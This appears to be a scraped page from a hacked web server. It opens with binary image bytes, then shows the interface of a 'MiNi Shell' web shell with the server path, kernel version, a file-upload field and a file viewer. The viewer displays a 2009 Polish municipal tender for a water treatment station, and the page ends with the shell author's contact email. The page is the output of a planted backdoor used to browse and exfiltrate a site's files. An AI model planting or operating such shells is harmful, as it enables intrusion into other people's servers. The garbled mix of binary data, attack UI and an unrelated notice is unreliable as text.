JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090703/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090703/222762-N-2009.html

<p class="kh_header"><b>Lubniewice: Modernizacja stacji uzdatniania wody i budowa pompowni strefowej dla miejscowości Lubniewice</b><br>
<b>Numer ogłoszenia: 222762 - 2009; data zamieszczenia: 03.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubniewice , ul. Jana Pawła II 51, 69-210 Lubniewice, woj. lubuskie, tel. 095 755 70 52, faks 095 755 75 99.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubniewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja stacji uzdatniania wody i budowa pompowni strefowej dla miejscowości Lubniewice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie dwóch zadań: 
Modernizacja stacji uzdatniania wody i budowa pompowni strefowej dla miejscowości Lubniewice
Zadanie A
Wykonanie otworu nr 4, przyłączenie studni do układu technologicznego wraz 
z budową stacji uzdatniania wody w Lubniewicach
Zadanie B
Budowa strefowej przepompowni wody wraz z retencyjnym zbiornikiem pośrednim 
2.	Parametry rzeczowe inwestycji:
Zadanie A
-	Wykonanie studni głębinowej nr 4 wraz z wykonaniem naziemnej obudowy studni 
z przyłączeniem jej do nowobudowanego budynku SUW
-	Budowa nowego budynku stacji uzdatniania wody o parametrach dł. 16,68 m, szer. 15,96 m, wys. 8,87 m, powierzchnia użytkowa 240,84 m2, kubatura 1.480,07 m3
-	Wyposażenie technologiczne SUW w dwustopniowy układ filtracji na filtrach ciśnieniowych z dwustopniowym układem pompowania wody 
-	Wykonanie instalacji elektrycznych oraz AKPiA z wizualizacją komputerową pracy układu technologicznego w oczyszczalni ścieków w Lubniewicach
-	Remont żelbetowego zbiornika retencyjnego wody polegający na zmyciu, wypiaskowaniu i ułożeniu warstw izolacyjnych wewnątrz zbiornika
-	Budowa sieci międzyobiektowych (kanalizacyjnych, wodociągowych oraz energetycznych)
-	Budowa nowego budynku agregatorowni o parametrach dł. 7 m, szer. 5 m, wys. 5,15 m, powierzchnia użytkowa 26,36 m2, kubatura 146,12 m3,
-	Wyposażenie budynku agregatorowni 
-	Wykonanie dróg wewnętrznych, parkingów i zagospodarowanie terenu
-	Wykonanie ogrodzenia działki.
Zadanie B
-	Budowa budynku przepompowni strefowej o parametrach dł. 12,48 m, szer. 7,22 m, wys. 6,18 m, powierzchnia użytkowa 74,46 m2, kubatura 421,67 m3
-	Instalacja dwóch nierdzewnych zbiorników retencyjnych o poj. V=25 m3 każdy
-	Wykonanie instalacji elektrycznych oraz AKPiA umożliwiającej współpracę 
z analizatorem sieci wodociągowej zainstalowanym w sterowniku SUW Lubniewice oraz wizualizację komputerową pracy układu technologicznego w oczyszczalni ścieków w Lubniewicach
-	Wykonanie zjazdu z drogi gminnej dz. nr 965 z wykonaniem dróg wewnętrznych i parkingu
-	Wykonanie ogrodzenia działki.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.10.00.00-8, 45.00.00.00-7, 45.33.00.00-9, 45.31.00.00-3, 45.30.00.00-0, 45.40.00.00-1, 45.26.22.20-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości  130.000,00 zł (słownie złotych: sto trzydzieści tysięcy 00/100).
2. Wadium można wnieść w formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
            - pieniądzu,
            - poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -      
              kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt. 1-4 ustawy Pzp, tj.: 
1)	posiadają uprawnienia do wykonywania określonej w przedmiocie zamówienia działalności lub czynności; 

2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia tj.:
a)	dysponują osobami: 

	Geolog nadzoru  - posiadającego kwalifikacje uprawniające  w zakresie nadzorowana robót hydrogeologicznych oraz dokumentowania zasobów wód podziemnych.
	Kierownik wierceń - posiadającego kwalifikacje średniego dozoru wiertniczego potwierdzone przez Okręgowy Urząd Górniczy. 
	Brygadzista wiertacz - posiadającego kwalifikacje niższe górnicze do prowadzenia prac wiertniczych.
	Kierownik Budowy branża sanitarna - wymagane uprawnienia budowlane do kierowania i nadzorowania robót w zakresie pełnym bez ograniczeń
	Kierownik robót elektrycznych - wymagane uprawnienia budowlane do kierowania i nadzorowania robót.
	Kierownik robót drogowych - wymagane uprawnienia budowlane do kierowania 
i nadzorowania robót w zakresie pełnym.
	Kierownika robót budowlanych - wymagane uprawnienia budowlane do kierowania i nadzorowania robót w zakresie pełnym. 
	min. 15 pracowników fizycznych przeznaczonych do realizacji zamówienia

Wykonawca zobowiązany jest dołączyć do oferty ksero uprawnień oraz ksero zaświadczenia, potwierdzone za zgodność z oryginałem, wydanego przez właściwą izbę samorządu zawodowego, potwierdzające wpis danej osoby na listę członków właściwej izby.

Wykonawca może przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia

b)	Doświadczenie Wykonawcy 
	zrealizował co najmniej dwa zadania, których przedmiotem było wykonanie studni głębinowych o wydajności nie mniejszej niż 60 m3/h wraz z niezbędną infrastrukturą oraz podłączeniem ich do technologii SUW
	wykonał co najmniej dwa obiekty automatycznej stacji uzdatniania wody wraz z systemem jej monitoringu, przesyłem danych drogą GPRS, ze zdalczynnym nadzorem nad obiektem poprzez sieć Internet
	wykonał co najmniej dwa zadania związane z budową lub rozbudową stacji uzdatniania wody o średniej wartości nie mniejszej niż 1.000.000 PLN (słownie: jeden milion złotych)

Warunek wymieniony, w punkcie 1) musi zostać spełniony łącznie przez wszystkich Wykonawców wspólnie ubiegających się o zamówienie.

3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. 
a)	posiadają polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 1.000.000,00 zł
b)	posiadają dostęp do linii kredytowej lub wolne środki w wysokości 5.000.000,00 zł

4)	nie podlegają wykluczeniu na podstawie art. 24 ustawy - Prawo zamówień publicznych.
2.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.
3.	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; w przypadku, gdy Wykonawcą jest spółka cywilna lub jawna - umowę spółki.

2.	Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego, oraz oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

3.	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 pkt. 1-3 - na formularzu lub w oparciu o formularz stanowiący Załącznik nr 2 do niniejszej SIWZ.

4.	Oświadczenie Wykonawcy o nie podleganiu  wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy, na formularzu lub w oparciu o formularz stanowiący Załącznik nr 3 do SIWZ.

5.	Wykaz osób i podmiotów przewidzianych do wykonania zamówienia i ich uprawnienia budowlane wymagane zgodnie z przepisami Prawa budowlanego wraz z przynależnością do Okręgowej Izby Inżynierów Budownictwa  /Wykonawca musi dysponować osobami posiadającymi uprawnienia do kierowania robotami budowlanymi w specjalnościach                   a) ogólnobudowlanej, b) drogowej, c) sanitarnej,
sporządzony na formularzu lub w oparciu o formularz stanowiący Załącznik nr 4 do SIWZ - Potencjał kadrowy.
(dokumenty mogą być przedstawione w postaci kserokopii poświadczonych za zgodność z oryginałem).

W przypadku korzystania z usług innych podmiotów należy wypełnić załącznik 
nr 4a do SIWZ - Zobowiązanie innych podmiotów, w przeciwnym razie należy załączyć formularz z adnotacją NIE DOTYCZY

6.	Wykaz robót zrealizowanych w ciągu ostatnich 5 lat, sporządzony na formularzu lub 
w oparciu o formularz stanowiący Załącznik Nr 5 do SIWZ - Wykaz robót

7.	Wykaz podwykonawców oraz opis i zakres robót przewidzianych do realizacji przez podwykonawców wraz z zobowiązaniem podwykonawców do współpracy, na formularzu lub w oparciu o formularz stanowiący Załącznik nr 6 do SIWZ.

8.	Zaakceptowany wzór umowy - SIWZ Część II - Umowa.

9.	Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności gospodarczej. 
Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.


10.	Harmonogram rzeczowo-finansowy wykonania robót 

11.	Dowód wniesienia wadium. 

12.	Kosztorysy ofertowe w wersji pełnej sporządzony na podstawie kosztorysów nakładczych.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - 5 robót dodatkowych w cenie oferty netto - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lubniewice.pl w BIP, zakładka AKTUALNOŚCI/PRZETARGI.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Lubniewicach, ul. Jana Pawła II 51.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2009 godzina 10:00, miejsce: Urząd Miejskiw w Lubniewicach, ul. Jana Pawła II 51, sekretariat - pokój nr 8 na I piętrze.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com